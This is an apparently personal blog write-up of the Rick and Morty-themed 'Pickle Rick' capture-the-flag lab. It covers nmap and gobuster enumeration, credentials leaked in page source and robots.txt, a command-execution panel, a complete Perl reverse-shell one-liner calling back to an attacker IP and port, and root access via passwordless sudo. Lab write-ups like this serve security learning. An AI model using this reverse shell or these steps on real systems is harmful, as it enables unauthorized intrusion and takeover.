A Rick and Morty CTF. Help turn Rick back into a human! Link to room is here
data:image/s3,"s3://crabby-images/006ed/006ed37c56246ea3193772d5b25e1029777e84c9" alt=""
This is Rick and Morty themed challenge,we are Morty in this challenge. We have to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.Let’s use our hacking super power and hack the web server and save Rick.
Launch the box and let’s enumerate the IP given.
Use: nmap -sC -sV -A machine IP
- nmap is network mapper tool
- -sC -> default script scanning
- -sV -> version detection
data:image/s3,"s3://crabby-images/6ae77/6ae7780eca305badf915b7f46a64e4f85d6935fa" alt=""
We can see that the ports 22 and 80 are open.Port 22 is for SSH(secure shell ) and port 80 for HTTP. Lets go to the the browser and paste the IP there and check what is waiting for us.
data:image/s3,"s3://crabby-images/1f7be/1f7be5a8838fde17b1f66294291c9b7fa207dc78" alt=""
Let’s spend some time to enumerate this website.Let’s view the source code in that time.
data:image/s3,"s3://crabby-images/04e61/04e61ae5e18e0c01fe3b98b713d2316d2d549adb" alt=""
A user name is found here. let’s do directory enumeration and check other directories also.
Use: gobuster dir -u machine_ip -w wordlist_path
- gobuster -> tool
- dir-> directory enumeration mode
- -w ->specify wordlist path
data:image/s3,"s3://crabby-images/9e244/9e2449c031e774d524a652221e0770a073b09da2" alt=""
The results says there are many directories.Let’s open one by one.( I forgot to take screenshot)
- /login.php
- /robots.txt
- /assests
data:image/s3,"s3://crabby-images/0cfe4/0cfe4a4106d4da613f789a98074251868d522024" alt=""
data:image/s3,"s3://crabby-images/b6e0d/b6e0d973dc280546de71f3f6e0d23e29924e9d41" alt=""
Here I think we got a password.Let’s try the password and user name that we have in our hand now.
data:image/s3,"s3://crabby-images/35f0a/35f0acd2e977a8b7520b4c154cd5bef2f76923d7" alt=""
I viewed the source code of this logged in page and found something interesting.
data:image/s3,"s3://crabby-images/21aa5/21aa5eb1f3df98f6be58cac9ffb6fa02c4791910" alt=""
I guess we have a base64 encrypted password. Let’s go to CyberChef to crack it.
data:image/s3,"s3://crabby-images/32a1e/32a1e0b267113b3b8dacfc79fd01186491689bfd" alt=""
I had to do the decryption almost 9 times to understand it was a rabbit hole,But that’s Ok. Keep moving forward we need to save Rick.
Let’s check the logged in page.
Wait that’s strange! why is it showing a command panel here? Let’s execute some basic commands ans see.
data:image/s3,"s3://crabby-images/59287/5928776f0ed9b82989a303c6e0d7526f77d3a497" alt=""
This page has command execution vulnerability, Let’s try some more commands.
data:image/s3,"s3://crabby-images/04639/046391fe5a81069d4266f7578f3db4e65f2cdce9" alt=""
data:image/s3,"s3://crabby-images/9e9df/9e9dfcd364120801a091f0143f902e38bc618ec1" alt=""
Seems like our commands are sanitized.Which means our code will not be executed it will be just evaporate before it reaches the server.
Got another idea. We shall take a reverse shell from here.I used a Perl reverse shell code.
use:perl -e ‘use Socket;$i=”IP”;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
Listen to the port set.
data:image/s3,"s3://crabby-images/54178/5417881dfc32ed356abb467ab621697043a8285f" alt=""
Execute the command in the website and get the shell as shown below.
data:image/s3,"s3://crabby-images/9aa86/9aa86622b08ea335e26a2145e12120758b58fee2" alt=""
Now let’s execute some codes in the /var/www/html directory.
data:image/s3,"s3://crabby-images/8e0ea/8e0ead10ff9e5b8029ef5c092de203b6e0ed810e" alt=""
Now let’s move around through the server and find other two more secret ingredients.Let’s go to the /home directory and search.
data:image/s3,"s3://crabby-images/119bb/119bbc48363e68bcdfac8a3081010cf992553ccd" alt=""
We are one step away from saving Rick.
Use: sudo -l
data:image/s3,"s3://crabby-images/9ece6/9ece6351ef3bac33b283fbe377fe31aee6b3f3df" alt=""
We found something very interesting that we can run everything in sudo without a password.
Time for privilege escalation.
use: sudo su
data:image/s3,"s3://crabby-images/9c0b3/9c0b36aa148fa87516a260d8831925bca82f70fc" alt=""
We finally saved Rick.
Summary
- Basic enumeration done- port 22,port 80 open.
- We did directory enumeration on website.
- Website had command execution vulnerability.
- We took a reverse shell using perl code.
- We could switch user without password.
- We did sudo su to switch user and captured flags.
Thank you, peace out ✌️.
Leave a Reply